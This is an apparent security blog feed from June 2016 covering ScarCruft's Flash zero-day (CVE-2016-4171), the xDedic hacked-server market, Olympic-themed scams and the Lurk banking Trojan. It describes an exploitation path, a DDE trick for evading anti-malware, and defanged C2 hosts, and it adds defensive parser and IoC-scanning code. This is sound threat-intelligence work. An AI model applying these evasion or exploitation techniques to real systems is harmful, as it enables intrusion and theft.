Malware RSS Feed

Operation Daybreak

Malware Alerts - Fri, 06/17/2016 - 02:00

Earlier this year, we deployed new technologies in Kaspersky Lab products to identify and block zero-day attacks. This technology already proved its effectiveness earlier this year, when it caught an Adobe Flash zero-day exploit (CVE-2016-1010). Earlier this month, our technology caught another zero-day Adobe Flash Player exploit deployed in targeted attacks. We believe the attacks are launched by an APT group we track under the codename “ScarCruft”.

ScarCruft is a relatively new APT group; victims have been observed in Russia, Nepal, South Korea, China, India, Kuwait and Romania. The group has several ongoing operations, utilizing multiple exploits — two for Adobe Flash and one for Microsoft Internet Explorer.

Operation Daybreak appears to have been launched by ScarCruft in March 2016 and employs a previously unknown (0-day) Adobe Flash Player exploit. It is also possible that the group deployed another zero day exploit, CVE-2016-0147, which was patched in April.

The exploit caught by our technologies uses a few very interesting evasion methods, some of which we haven’t seen before. We describe them below.

Operation Daybreak general information

Operation Daybreak appears to have been launched by unknown attackers to infect high profile targets through spear-phishing e-mails. To date, we have observed more than two dozen victims for these attacks.

Although the exact attack vector remains unknown, the targets appear to receive a malicious link which points to a hacked website where the exploitation kit is hosted. The hacked web server hosting the exploit kit is associated with the ScarCruft APT and used in another line of attacks. Certain details, such as using the same infrastructure and targeting, make us believe that Operation Daybreak is being done by the ScarCruft APT group.

The ScarCruft APT group is a relatively new player and managed to stay under the radar for some time. In general, their work is very professional and focused. Their tools and techniques are well above the average. Prior to the discovery of Operation Daybreak, we observed the ScarCruft APT launching a series of attacks in Operation Erebus. Operation Erebus leverages another Flash Player exploit (CVE-2016-4117) through the use of watering hole attacks.

In the case of Operation Daybreak, the hacked website hosting the exploit kit performs a couple of browser checks before redirecting the visitor to a server controlled by the attackers hosted in Poland.

The main exploit page script contains a BASE64 decoder, as well as RC4 decryption implemented in JavaScript.

The parameters sent to the “ap.php” script are randomly generated on each hit, so the second-stage payload is encrypted differently each time. This prevents easy detection of the second-stage payload by MD5 or signatures.

The exploitation process consists of three Flash objects. The Flash object that triggers the vulnerability in Adobe Flash Player is located in the second SWF delivered to the victim.

At the end of the exploitation chain, the server sends a legitimate PDF file to the user – “china.pdf”. The “china.pdf” file shown to the victims in the last stage of the attack appears to be written in Korean:

Decoy document shown to victims

The document text talks about disagreements between China and “The North” over nuclear programs and demilitarization.

Vulnerability technical details

The vulnerability (CVE-2016-4171) is located in the code which parses the ExecPolicy metadata information.

This is what the structure looks like:

This structure also contains an array of item_info structures:

The documentation says the following about these structures:

“The item_info entry consists of item_count elements that are interpreted as key/value pairs of indices into the string table of the constant pool. If the value of key is zero, this is a keyless entry and only carries a value.”

In the exploit used by the ScarCruft group, we have the following item_info structures:

Item_info array in exploit object

The code that triggers the vulnerability parses this structure and, for every key and value member, tries to get the respective string object from the string constant pool. The problem is that the “.key” and “.value” members are used as indexes without any kind of boundary check. It is easy to see that if a key or value member is larger than the string constant pool array, a memory corruption problem appears. It is also important to mention that these members (value, key) are read directly from the SWF object, so an attacker can easily use them to implement arbitrary read/write operations.

Getting object by index from constant pool without any checks

Using this vulnerability, the exploit implements a series of writes at specified addresses to achieve full remote code execution.
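To show what the missing check looks like in a parser, here is an added example (not code from the original post or from Adobe): a bounds-checked reader for an item_info-style array whose key/value fields index a string table. The byte layout is modelled on the ABC metadata_info record (item_count followed by key/value pairs, each a variable-length u30 integer), and the string table, the sample blobs and the helper names are constructed for this example. The parser validates item_count against the remaining data and every index against the pool size before either is used, which is precisely the check the vulnerable code lacked.

```python
"""Bounds-checked parser for an item_info-style key/value index array.

Constructed example: the layout (u30 item_count, then u30 key/value pairs)
is modelled on the ABC metadata_info record; the string table and the
sample blobs below are made up for illustration."""


def read_u30(buf, pos):
    """Decode one u30 varint (7 data bits per byte, low bits first, max 5 bytes)."""
    value = 0
    for i in range(5):
        if pos >= len(buf):
            raise ValueError("truncated varint at offset %d" % pos)
        byte = buf[pos]
        pos += 1
        value |= (byte & 0x7F) << (7 * i)
        if not (byte & 0x80):
            return value & 0x3FFFFFFF, pos
    raise ValueError("varint longer than 5 bytes")


def encode_u30(value):
    """Inverse of read_u30; used only to build the constructed sample blobs."""
    out = bytearray()
    while True:
        byte = value & 0x7F
        value >>= 7
        if value:
            out.append(byte | 0x80)
        else:
            out.append(byte)
            return bytes(out)


def parse_item_info(buf, pos, string_table):
    """Parse item_count key/value pairs, validating every index before use.

    Returns (items, new_pos); each item is (key_or_None, value) resolved
    through string_table. Raises ValueError instead of indexing past the
    pool, which is the boundary check the vulnerable parser did not have."""
    item_count, pos = read_u30(buf, pos)
    # Every item needs at least two bytes; reject counts the buffer cannot hold.
    if item_count > (len(buf) - pos) // 2:
        raise ValueError("item_count %d exceeds remaining data" % item_count)
    pool_size = len(string_table)
    items = []
    for _ in range(item_count):
        key, pos = read_u30(buf, pos)
        value, pos = read_u30(buf, pos)
        if key >= pool_size or value >= pool_size:
            raise ValueError(
                "item index out of range (key=%d, value=%d, pool=%d)"
                % (key, value, pool_size))
        # Key 0 is a keyless entry, as the documentation quoted above states.
        items.append((None if key == 0 else string_table[key], string_table[value]))
    return items, pos


def build_item_info(pairs):
    """Serialize (key, value) index pairs into the sample layout."""
    blob = encode_u30(len(pairs))
    for key, value in pairs:
        blob += encode_u30(key) + encode_u30(value)
    return bytes(blob)


# Constructed string constant pool; slot 0 holds the conventional empty string.
STRING_TABLE = ["", "Version", "1.0", "ExecPolicy", "Allow"]

# A well-formed sample and a hostile one whose indices point far outside the pool.
GOOD_BLOB = build_item_info([(1, 2), (0, 4)])
HOSTILE_BLOB = build_item_info([(0x0FFFFFFF, 0x0FFFFFFF)])


def classify(blob, string_table=STRING_TABLE):
    """Return ("ok", items) for a valid blob or ("rejected", reason) otherwise."""
    try:
        items, _ = parse_item_info(blob, 0, string_table)
        return ("ok", items)
    except ValueError as exc:
        return ("rejected", str(exc))


if __name__ == "__main__":
    print(classify(GOOD_BLOB))
    print(classify(HOSTILE_BLOB))
```

Run as a script, the well-formed blob resolves to its strings and the hostile blob is rejected with the offending indices named; a native parser that skips this comparison would instead compute a pointer from the attacker-supplied index and read or write wherever it lands.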

Bypassing security solutions through DDE

The Operation Daybreak attack employs multiple stages, which are all outstanding in some way. One of them attracted our attention because it implements a bypass for security solutions we have never seen before.

In the first stage of the attack, the decrypted shellcode executed by the exploit downloads and executes a special DLL file, internally called “yay_release.dll”:

Second stage DLL internal name and export

The code of this module is loaded directly into the exploited application and has several methods of payload execution. One method uses a very interesting technique of payload execution which is designed mostly to bypass modern anti-malware products. It relies on an interesting bug in the Windows DDE component. It is no secret that anti-malware systems trigger on special system functions that are called in the context of potentially vulnerable applications, in order to perform deeper analysis of API calls such as CreateProcess, WinExec or ShellExecute.

For instance, such defense technologies trigger if a potentially vulnerable application such as Adobe Flash starts other untrusted applications, script interpreters or even the command console.

To make execution of the payload invisible to these defense systems, the threat actors used the Windows DDE interface in a very clever way. First, they register a special window for it:

In the window procedure, they post WM_DDE_EXECUTE messages with commands:

Sending WM_DDE_EXECUTE message to window

The attackers used the following commands:

The main idea here is that if you create a LNK to an executable or command and then use the ShowGroup method, the program will be executed. This is undocumented behavior in Microsoft Windows.

In our case, a malicious VBS was executed, which installs a next-stage payload stored in a CAB file:

Malicious VBS used in the attack

We have reported this “creative” abuse of DDE to Microsoft’s security team.

The final payload of the attack is a CAB file with the following MD5:

  • 8844a537e7f533192ca8e81886e70fbc

The MS CAB file (md5: 8844a537e7f533192ca8e81886e70fbc) contains 4 malicious DLL files:

MD5                               Filename
a6f14b547d9a7190a1f9f1c06f906063  cfgifut.dll
e51ce28c2e2d226365bc5315d3e5f83e  cldbct.dll
067681b79756156ba26c12bc36bf835c  cryptbase.dll
f8a2d4ddf9dc2de750c8b4b7ee45ba3f  msfte.dll

The file cldbct.dll (e51ce28c2e2d226365bc5315d3e5f83e) connects to the following C2:

  • hXXp://webconncheck.myfw[.]us:8080/8xrss.php

The modules are signed with invalid digital certificates listed as “Tencent Technology (Shenzhen) Company Limited”, with serial numbers copied from real Tencent certificates:

  • 5d 06 88 f9 04 0a d5 22 87 fc 32 ad ec eb 85 b0
  • 71 70 bd 93 cf 3f 18 9a e6 45 2b 51 4c 49 34 0e

Invalid digital signature on malware samples

The malware deployed in this attack is extremely rare and apparently reserved only for high-profile victims. Our products detect it, as well as other malware from ScarCruft, as HEUR:Trojan.Win32.ScarCruft.gen.


Although our visibility is rather limited, some of the victims of these attacks include:

  • A law enforcement agency in an Asian country
  • One of the largest trading companies in Asia and in the world
  • A mobile advertising and app monetization company in the USA
  • Individuals related to the International Association of Athletics Federations
  • A restaurant located in one of the top malls in Dubai

Some of these were compromised over the last few days, indicating the attackers are still very active.


Nowadays, in-the-wild Flash Player exploits are becoming rare. This is because in most cases they need to be coupled with a Sandbox bypass exploit, which makes them rather tricky.

Additionally, Adobe has been doing a great job at implementing new mitigations to make exploitation of Flash Player more and more difficult.

Nevertheless, resourceful threat actors such as ScarCruft will probably continue to deploy zero-day exploits against their high profile targets.

As usual, the best defense against targeted attacks is a multi-layered approach. Windows users should combine traditional anti-malware technologies with patch management, host intrusion detection and, ideally, whitelisting and default-deny strategies. According to a study by the Australian DSD, 85% of the targeted attacks analysed could have been stopped by four simple defense strategies. While it’s impossible to achieve 100% protection, in practice and in most cases all you have to do is raise your defenses to the point where it becomes too expensive for the attacker – who will then give up and move on to other targets.

Kaspersky products detect the Flash exploit as HEUR:Exploit.SWF.Agent.gen, and our AEP (Automatic Exploit Prevention) component can also successfully detect this attack. Payloads are detected with the HEUR:Trojan.Win32.ScarCruft.gen verdict.

* More information about the ScarCruft APT group is available to customers of Kaspersky Intelligent Services.

Indicators of compromise

Malicious IPs and hostnames:
  • 212.7.217[.]10
  • reg.flnet[.]org
  • webconncheck.myfw[.]us
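As a worked example of putting the published indicators to use, the following added code (not part of the original post) refangs the defanged notation used above (hXXp://, [.]), normalizes the MD5s and certificate serials, and runs them over constructed sample data: a few proxy log lines, a file hash inventory and signing records. The log format, file paths and the benign entries are made up for this example; only the indicator values come from the write-up.

```python
import re

# Indicators exactly as published in the write-up above, in defanged form.
DEFANGED_INDICATORS = {
    "hosts": ["212.7.217[.]10", "reg.flnet[.]org", "webconncheck.myfw[.]us"],
    "urls": ["hXXp://webconncheck.myfw[.]us:8080/8xrss.php"],
    "md5": [
        "8844a537e7f533192ca8e81886e70fbc",  # CAB container
        "a6f14b547d9a7190a1f9f1c06f906063",  # cfgifut.dll
        "e51ce28c2e2d226365bc5315d3e5f83e",  # cldbct.dll
        "067681b79756156ba26c12bc36bf835c",  # cryptbase.dll
        "f8a2d4ddf9dc2de750c8b4b7ee45ba3f",  # msfte.dll
    ],
    "cert_serials": [
        "5d 06 88 f9 04 0a d5 22 87 fc 32 ad ec eb 85 b0",
        "71 70 bd 93 cf 3f 18 9a e6 45 2b 51 4c 49 34 0e",
    ],
}


def refang(indicator):
    """Undo report-style defanging (hXXp://, [.]) so the value can be matched."""
    text = indicator.replace("[.]", ".")
    text = re.sub(r"^hxxp(s?)://", r"http\1://", text, flags=re.IGNORECASE)
    return text.lower()


def normalize_serial(serial):
    """Reduce a certificate serial to bare lowercase hex regardless of separators."""
    return re.sub(r"[^0-9a-f]", "", serial.lower())


def build_iocs():
    """Normalize every indicator once so the scanners below can use set lookups."""
    return {
        "hosts": {refang(h) for h in DEFANGED_INDICATORS["hosts"]},
        "urls": {refang(u) for u in DEFANGED_INDICATORS["urls"]},
        "md5": {h.lower() for h in DEFANGED_INDICATORS["md5"]},
        "cert_serials": {normalize_serial(s) for s in DEFANGED_INDICATORS["cert_serials"]},
    }


def url_host(url):
    """Extract the host from a URL or host:port token, dropping scheme, port and path."""
    without_scheme = re.sub(r"^[a-z]+://", "", url.lower())
    return without_scheme.split("/", 1)[0].split(":", 1)[0]


def scan_proxy_log(lines, iocs):
    """Return (line number, matched indicator) for lines hitting a URL or host IoC.

    Constructed line shape: '<timestamp> <client ip> <method> <url|host:port> <status>'."""
    hits = []
    for number, line in enumerate(lines, 1):
        fields = line.split()
        if len(fields) < 4:
            continue
        url = fields[3].lower()
        if url in iocs["urls"]:
            hits.append((number, url))
        elif url_host(url) in iocs["hosts"]:
            hits.append((number, url_host(url)))
    return hits


def scan_hashes(inventory, iocs):
    """Return (path, md5) for inventory entries whose MD5 is a known-bad hash."""
    return [(path, md5.lower()) for path, md5 in inventory if md5.lower() in iocs["md5"]]


def scan_signatures(records, iocs):
    """Return file names whose signing certificate carries one of the copied serials.

    Each record is (file name, signer subject, serial, signature valid?). The serial
    alone is the trigger: a copied serial under an invalid signature is exactly the
    pattern the write-up describes."""
    return [name for name, _signer, serial, _valid in records
            if normalize_serial(serial) in iocs["cert_serials"]]


# Constructed sample data (not real logs or hosts), seeded with the published IoCs.
SAMPLE_PROXY_LOG = [
    "2016-06-14T10:01:02Z 10.0.0.15 GET http://www.example.com/index.html 200",
    "2016-06-14T10:03:44Z 10.0.0.15 GET http://webconncheck.myfw.us:8080/8xrss.php 200",
    "2016-06-14T10:05:10Z 10.0.0.22 CONNECT 212.7.217.10:443 200",
    "2016-06-14T10:07:31Z 10.0.0.31 GET http://reg.flnet.org/update 404",
]
SAMPLE_FILE_INVENTORY = [
    ("C:\\Windows\\System32\\example.dll", "00000000000000000000000000000000"),
    ("C:\\Users\\victim\\AppData\\Local\\Temp\\cldbct.dll", "E51CE28C2E2D226365BC5315D3E5F83E"),
]
SAMPLE_SIGNATURES = [
    ("msfte.dll", "Tencent Technology (Shenzhen) Company Limited",
     "71:70:bd:93:cf:3f:18:9a:e6:45:2b:51:4c:49:34:0e", False),
    ("example_signed.dll", "Example Signer", "01:02:03:04:05:06:07:08", True),
]

if __name__ == "__main__":
    iocs = build_iocs()
    print(scan_proxy_log(SAMPLE_PROXY_LOG, iocs))
    print(scan_hashes(SAMPLE_FILE_INVENTORY, iocs))
    print(scan_signatures(SAMPLE_SIGNATURES, iocs))
```

Matching on the host rather than the raw token is what lets the CONNECT line (host:port, no scheme) and the GET line (scheme, port and path) both resolve to the same indicator; serials are compared stripped of separators because tools print them with spaces, colons or nothing at all.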


xDedic – the shady world of hacked servers for sale

Malware Alerts - Wed, 06/15/2016 - 06:59

Over the last two years, deep in the slums of the Internet, a different kind of underground market has flourished.

The short, cryptic name perhaps doesn’t say much about it: xDedic. However, on this obscure marketplace anyone can purchase more than 70,000 hacked servers from all around the Internet.

xDedic forum login

From government networks to corporations, from web servers to databases, xDedic provides a marketplace for buyers to find anything. And the best thing about it – it’s cheap! Purchasing access to a server located in a European Union country government network can cost as little as $6.

The one-time cost gives a malicious buyer access to all the data on the server and the possibility to use this access to launch further attacks. It is a hacker’s dream, simplifying access to victims, making it cheaper and faster, and opening up new possibilities for both cybercriminals and advanced threat actors.

Server purchase forum

To investigate xDedic, Kaspersky Lab teamed up with a European ISP. The research allowed us to collect data about the victims and the way the marketplace operates.

In May 2016, we counted 70,624 servers available for purchase, from 416 unique sellers in 173 affected countries. In March 2016, the number was about 55,000, a clear indication that the database of users and servers is carefully maintained and updated.

Top countries with servers on sale

Interestingly, the developers of xDedic are not selling anything themselves – instead, they have created a marketplace where a network of affiliates can sell access to compromised servers. If the truth be told, the people behind xDedic have created what appears to be a “quality” service – the forum even includes live technical support, special tools to patch hacked servers to allow multiple RDP sessions and profiling tools that upload information about the hacked servers into the xDedic database.

Top 10 sellers – May 2016

So who are the xDedic sellers listed above? We have been able to identify a very specific piece of malware (SCCLIENT) which is used by one of them, and to sinkhole its C&Cs. This provided a glimpse into the operations of one of these entities, which, based on the number of victims, we suspect is either Narko, xLeon or sirr.

SCCLIENT Trojan: victims’ information from sinkholing (first 12 hours)

The profiling software created by the xDedic developers also collects information about the software installed on the server, such as online gambling, trading and payments.

Apparently, there is strong interest in accounting, tax reporting and point-of-sale (PoS) software, which opens up many opportunities for fraudsters:

Spam and Attacking Tools:
  • Advanced Mass Sender
  • Bitvise Tunnelier
  • DU Brute
  • LexisNexis Spam Soft
  • LexisNexis Proxifier
  • Spam Soft

Gambling and Financial Software:
  • Full Tilt Poker
  • iPoker Network
  • UltraTax 2010 (2011,..,2015)
  • Abacus Tax Software
  • CCH tax14 (tax15)
  • CCH Small Firm Services
  • ProSeries TAX (2014,2015)
  • ProSystem fx Tax
  • TAX Software
  • 2015 Tax Preparation
  • Tax Management Inc.
  • Lacerte Tax

POS Software:
  • POS Active-Charge
  • POS Amigo
  • POS Catapult
  • POS Firefly
  • POS EasiPos
  • POS Revel
  • POS Software (Generic)
  • POS Toast
  • POS kiosk.exe
  • POS roi.exe
  • POS PTService.exe
  • POS pxpp.exe
  • POS w3wp.exe
  • POS DpsEftX.ocx
  • POS AxUpdatePortal.exe
  • POS callerIdserver.exe
  • POS XChgrSrv.exe

During our research, we counted 453 servers from 67 countries with PoS software installed:

Servers for sale with Point-of-Sale software – May 2016

For instance, a malicious user could go to the xDedic forum, register an account, top it up with Bitcoins and then purchase a number of servers which have PoS software installed. Then, they can install PoS malware, such as Backoff to harvest credit card numbers. The possibilities are truly endless.

Kaspersky Lab has reported this issue with the appropriate law enforcement agencies and is cooperating in an ongoing investigation.

To read our full report on xDedic which includes IOCs, download the xDedic Marketplace Analysis PDF here.

* For more information about Kaspersky Lab Intelligence Services, Threat Reports and custom threat analysis contact

CVE-2016-4171 – Adobe Flash Zero-day used in targeted attacks

Malware Alerts - Tue, 06/14/2016 - 14:38

Earlier today, Adobe published the security advisory APSA16-03, which describes a critical vulnerability in Adobe Flash Player version and earlier versions for Windows, Macintosh, Linux, and Chrome OS:

A few months ago, we deployed a new set of technologies into our products designed to identify and block zero-day attacks. These technologies already proved their effectiveness earlier this year, when they caught an Adobe Flash zero-day exploit, CVE-2016-1010. Earlier this month, we caught another zero-day Adobe Flash Player exploit deployed in targeted attacks.

We believe these attacks are launched by an APT Group we call “ScarCruft”.

ScarCruft is a relatively new APT group; victims have been observed in several countries, including Russia, Nepal, South Korea, China, India, Kuwait and Romania. The group has several ongoing operations utilizing multiple exploits — two for Adobe Flash and one for Microsoft Internet Explorer.

Currently, the group is engaged in two major operations: Operation Daybreak and Operation Erebus. The first of them, Operation Daybreak, appears to have been launched by ScarCruft in March 2016 and employs a previously unknown (0-day) Adobe Flash Player exploit, focusing on high-profile victims. The other one, “Operation Erebus”, employs an older exploit, for CVE-2016-4117, and leverages watering holes. It is also possible that the group deployed another zero-day exploit, CVE-2016-0147, which was patched in April.

We will publish more details about the attack once Adobe patches the vulnerability, which should be on June 16. Until then, we confirm that Microsoft EMET is effective at mitigating the attacks. Additionally, our products detect and block the exploit, as well as the malware used by the ScarCruft APT threat actor.

* More information about the ScarCruft APT and Operation Daybreak is available to customers of Kaspersky Intelligence Services. Contact:


IT threats during the 2016 Olympic Games in Brazil

Malware Alerts - Mon, 06/13/2016 - 07:47

Olympic threats designed to trick you

Are you planning to visit Brazil during the Olympic Games? Or watch it online? In this blog post we discuss the threats to visitors aiming to travel to Brazil to watch the games and to those planning to watch it online. In the first part we’ll talk about phishing attacks, including one against the organizers of the Games; in the second we highlight WiFi security and the results of the wardriving we did on the streets of Rio, visiting the same places as tourists and the athletes. In the third and final part we touch upon physical security that involves the usage of USB charging spots at airports, the problem of credit card cloning and ATM skimmers that will directly affect visitors to this summer’s Olympic Games in Rio.

It is clear that using the Olympic Games theme is very attractive to the bad guys. Cybercriminals always use popular sports events as bait for their attacks, as they did during the 2014 World Cup – an event we monitored very closely due to the impressive number of attacks registered at the time, mainly in Brazil. But the forthcoming Olympic Games have been a bit different. The number of attacks has been low compared with the World Cup. There are many reasons for this, one of which is that the International Olympic Committee (IOC) keeps a very active Security Operations Center (SOC), handling security incidents and reporting phishing and malware campaigns. As a result, the number of “in-the-wild” attacks targeting users at this time is low.

However, the bad guys have no limit when it comes to creating new attacks. We were able to track and block several of them, such as the registration of malicious domains, fake giveaways promoted on social networks and, of course, websites selling fake tickets, using all possible ways to trick users.

The rise of bad domains

Most of the attacks start with the registration of a domain that clearly shows its malicious intent. Since the beginning of the year, we have monitored the creation of new domains registered with the name of the city that will host the games. In fact, we found that the bad guys are constantly registering new domains at the start of every attack. Our blacklist contains more than 230 of these bad domains.

Several of these domains were registered via a free webmail account or use protection services to hide the real identity of the owner. Some of these domains are hibernating, waiting for the right moment to start an attack (especially those promising free streaming). Others were used to host fake e-commerce sites selling tickets, to host phishing or malware, or even to spread fake ticket giveaways. Another interesting point is that several of these domains are already using the new gTLDs approved by ICANN (such as .tech and others).

The phishing phenomenon

It’s not only end users who are targets of phishing attacks. Brazil tops the list as the most attacked country with this type of scam, and employees of the Games organization were also targeted for their potentially lucrative credentials. In February we identified, through our domain monitoring system, a very interesting targeted campaign against the IOC, using a malicious domain that masqueraded as their intranet portal. The purpose of the attackers was to steal credentials of IOC employees working in Brazil. The fake site looked like this when it was live, and we are also aware of several other attacks including this one:

IOC employees were the target of phishing campaigns to steal credentials

The most common attacks are those that aim to phish the end user – stealing credentials is a very easy attack that even a non-skilled criminal can carry out. We saw phishing scams with different goals, in several colors and guises. This one was very popular in Brazil and aims to clone your credit card using the name of a Brazilian company and promising to give away a new car and tickets to the Games:

Free tickets and car giveaway. All fake promises.

Fake tickets, fake giveaways, real losses

As happened during the last World Cup, most of the malicious e-mails sent by the Brazilian bad guys used free tickets to watch the Games in Rio as the bait. Some of these messages also pointed to fake websites. This is a good example of a very well done campaign, promising direct sales of tickets without applying to the official lotteries that are held for people living in Brazil:

Why bother to participate in the official lottery when you can buy a ticket direct from a fraudster?

Other fake websites also offered tickets at a very low price, to attract people looking to buy tickets at the last minute. This website, targeting Brazilians, looks good but on closer inspection is written in poor Portuguese:

The purpose here was to sell fake tickets with the victim paying but receiving nothing. The payment method selected by the fraudster was Brazilian boletos, a very popular payment system, used mostly for people that don’t have credit cards.

The bait to attract attention was very low prices. The ticket to the opening ceremony cost U$500.00 and a match of the Brazilian National Football Team cost only U$ 50.00. Of course everything was fake:

“Watch the Male Football match paying only U$ 50,00”

Bad guys also used social media to spread their attacks. Facebook was the most used network in these cases, such as this fraudulent page announcing a fake ticket giveaway. The page is still online:

If you want to watch the games, it’s too late to buy tickets via the official channels. We do not recommend buying through unofficial markets as there is a high possibility that you are buying a pig in a poke. To make sure you don’t get caught out, the best thing is to watch the games on TV or online – but be aware of malicious streaming websites, as they will undoubtedly appear in a last ditch attempt by the bad guys to try and infect your computer and steal your data.

WiFi security

When we travel, we usually access the Internet more, to stay in touch, tweet, post status updates and share pictures. However, international data plans are usually very expensive, and this is why we look for WiFi hotspots. Cybercriminals know this and every year set up fake access points or compromise legitimate WiFi networks to intercept and manipulate their victims’ browsing. The focus of the attack is users’ passwords, credit cards and other sensitive personal information. Open and misconfigured WiFi networks are actually the preferred vehicles for criminals.

To identify the extent of the problem in Brazil, we drove by three major areas of the Olympic games and passively monitored the available networks which visitors are most likely to try and use during their stay – the Brazilian Olympic Committee building, Olympic Park and the stadiums (Maracanã, Maracanãzinho and Engenhão).

Beautiful beaches, bossa nova and insecure WiFi

Running a quick survey over two days in the areas marked with a star on the map, we were able to find about 4,500 unique access points in those areas.

Most of the networks actually work on the 802.11n standard:

That means that most of the hardware used to build the WiFi access points is new and works especially well for multimedia streaming, reaching speeds of up to 600Mbps and working not just on 2.4GHz and 2.5GHz but also 5GHz.

However, when it comes to their security, 18% of all available WiFi networks in the area are insecure and openly configured. That means that all data sent and received in such networks is not protected by any encryption access key.

We can also see that 7% of all networks are WPA-personal protected. That algorithm is actually obsolete today and can be broken with minimal effort. In our opinion this is especially concerning, as users who connect to their “trusted” networks may believe that they are actually connecting to a secure network, when in reality it could be compromised by an attacker who could deliver different kinds of attacks to manipulate network traffic carrying users’ data.

So, about a quarter of all WiFi networks in the areas of the Olympic games are insecure or configured with weak encryption protocols. This means that attackers can break into them first and then set up the means to sniff victims’ browsing data and steal their sensitive data.

Is it possible to use an open WiFi network and still have a secure Internet connection? The answer is yes, however only when using a VPN connection.

We strongly recommend, regardless of any WiFi network you use while travelling, to use a VPN connection, so the data from your end-point travels to the Internet through an encrypted data channel. This way even if you work from a compromised WiFi network, the attacker might not get access to your data.

However, not all VPN providers actually offer the same good service. Some of them are vulnerable to DNS leak attacks. That means that even if your immediate sensitive data is sent via VPN, your DNS queries are sent in plain text to the DNS servers set by the access point hardware. In this scenario the attacker can still at least know what servers you are browsing and then, if they have access to the access point of the compromised WiFi network, can define malicious DNS servers. That would essentially mean that the next time you type the name of your bank in the browser, the IP address it resolves to will be a malicious one. So, even some experienced users may become an easy victim for the attackers. There is almost no limit from the attackers’ point of view when they have control of your DNS servers.

So, before you use your VPN connection, make sure it does not have a DNS leak problem. If your VPN provider doesn’t support its own DNS servers, you might consider another VPN provider or a DNSCrypt service, so your DNS requests will make external and encrypted queries to secure DNS servers. Remember that what starts as a small security issue could have big security implications.

The simple rule is this: on any network you connect to, use your VPN connection with its own DNS servers. Don’t rely on any local settings, since you can’t be sure whether the WiFi access point you connect to is compromised or not.

Physical security

Another point that requires vigilance when travelling is physical security – not everything that is useful is exactly what it seems. Criminals often use tactics to deliver malicious attacks in situations where you do not necessarily think there is a risk. Let’s look at some common situations where this could happen.

USB charging spot

As mentioned before, using a mobile phone when traveling is crucial, and it can be a big challenge to keep it sufficiently charged all day long. In order to help tourists, most cities are investing in charging points that can be easily found in shopping malls, airports and taxis. Most of them provide connectors for the majority of phone models as well as a USB connector that can be used with your own cable.

Charging spot provided in a Brazilian cab

Some models usually found in shopping malls and airports also provide a traditional power supply that can be used with your own charger.

Charging spot at Rio International Airport. Which one do you think is the most secure?

While connected via USB, the attacker can execute commands in order to get information about the device, including the model, IMEI, phone number and battery status. With that information it is possible to run an attack for the specific phone model and then successfully infect the device and collect personal information.

This doesn’t mean that we should never charge our devices when away from home, but by following these simple rules you can protect yourself from this kind of attack:

  • Always use your own charger and avoid buying one from unknown sources;
  • Use the power outlet instead of USB socket when using an unknown charging point;
  • Don’t use the charging cables at a public charging spot.

ATM skimmer

The ATM skimmer attack, also known as “Chupa-cabra” in Brazil and other countries in Latin America, is a very popular type of attack that is still being used by criminals in Brazil. From time to time a new gang appears on the news delivering this attack somewhere across the country, mainly in places commonly frequented by tourists, such as the Rio International Airport. In 2014 a gang installed 14 ATM skimmers there.

There are different types of ATM skimmers in Brazil; the most common type simply installs a reader for the card and a camera in order to record the password as it is typed.

An ATM skimmer which installs a camera to record the typed password

For this type of skimmer you can protect yourself by hiding the keypad while typing the password, which prevents your password from being recorded by the installed camera.

Unfortunately, this method will not help in all cases, as there is another type of skimmer where criminals replace the entire ATM, including the keypad and screen. In this case, the typed password will be stored on the fake ATM system.

ATM Skimmer which replaces the entire ATM

In order to avoid this type of attack it is important to be aware of any suspicious behavior while using the ATM.

  • Check if the green light on the card reader is on. Usually they replace the reader with a version where there is no light or it is off.
  • Before starting the transaction, check if there is anything suspicious on the ATM such as missing or badly fixed parts;
  • Hide the keypad while typing your password.

Credit Card Cloning

Unfortunately, Brazil is well known for its credit card cloning activities and it is not hard to find someone who had their card cloned while visiting the country.

Credit and debit cards are widely used in Brazil, and cards are accepted as a payment method almost everywhere – including by street vendors. Actually, most of them prefer credit card payments in order to avoid problems with change.

Brazilian banks are recognized across the world for their fight against credit card cloning, as well as for their pioneer status in adopting chip-based cards to protect customers from this type of attack by making it much harder to clone the card. However, it was only a matter of time before Brazilian criminals would find a way to start cloning chip-based cards, by exploiting flaws in the EMV transaction implementation.

We could see Brazilian criminals exchanging information about how to execute an attack on a chip-based card in order to extract the information and then write it back to another card using some tools.

Tool used to save the information to the smart card

It is really hard to protect yourself against this type of attack, because usually the point-of-sale terminal is modified in order to save the information, to be collected later by the criminals. Sometimes they don’t even need physical access to extract the stolen information, as it is collected via Bluetooth.

One good solution from the banks is SMS notifications for each transaction made using your card. Even though it does not prevent card cloning, the victim is notified about the fraudulent transaction as soon as it happens and can then contact the bank in order to block future transactions.

To reduce the chances of having your card cloned, there are some simple steps to take:

  • Never give your card to the retailer. If for some reason they cannot bring the machine to you, you must go to the machine;
  • If the machine looks suspicious, change the payment method. It is always good to have some money with you as a back-up;
  • Before typing your PIN make sure you are on the correct payment screen and that your PIN is not going to be shown on the screen.

For everybody visiting Brazil to watch the games, we wish you safe flights and a safe stay. To our readers we wish you safe online surfing and for the Olympic athletes, may the best one win!

Lurk Banker Trojan: Exclusively for Russia

Malware Alerts - Fri, 06/10/2016 - 07:32

One piece of advice that often appears in closed message boards used by Russian cybercriminals is “Don’t work with RU”. This is a kind of instruction given by more experienced Russian criminals to the younger generation. It can be interpreted as: “don’t steal money from people in Russia, don’t infect their machines, don’t use compatriots to launder money.”

“Working with RU” is not a great idea where cybercriminals’ safety is concerned: people from other countries are unlikely to report an incident to the Russian police. In addition, online banking is not very popular in the RU zone – at least, it is much less popular than in the West. This means that the potential income from operating in the RU zone is lower than in other zones, while the risk is higher. Hence the rule “Don’t work with RU”.

As always, there are exceptions to the rule. A rather prominent banker Trojan – Lurk – that is the subject of this paper has been used to steal money from Russian residents for several years.

We have written about this banker Trojan before. It caught our attention almost as soon as it appeared because it used a fileless spreading mechanism – malicious code was not saved on the hard drive and ran in memory only. However, until now no detailed description of Lurk had been published.

What Makes the Trojan Different

The Lurk banker Trojan is in a league of its own when it comes to malware designed to steal money from bank customers:

  • Lurk has existed and actively evolved for over five years, but it works selectively – only on those computers where it can steal money. In the more than five years that it has been active, about 60,000 bots have been registered in the C&C, which is not a huge number.
  • Lurk is a versatile banker Trojan – it can steal money not only from the iBank 2 system that is used by many Russian banks but also from the unique online banking systems of some large Russian banks.
  • Lurk actively resists detection: its developers work hard to minimize detections of their Trojan, while targeted attacks make it difficult to get new samples quickly.
  • Based on the methods of internal organization used in the malware, its feature set and the frequency with which it is modified, it can be concluded that a team of professional developers and testers is working on the project.

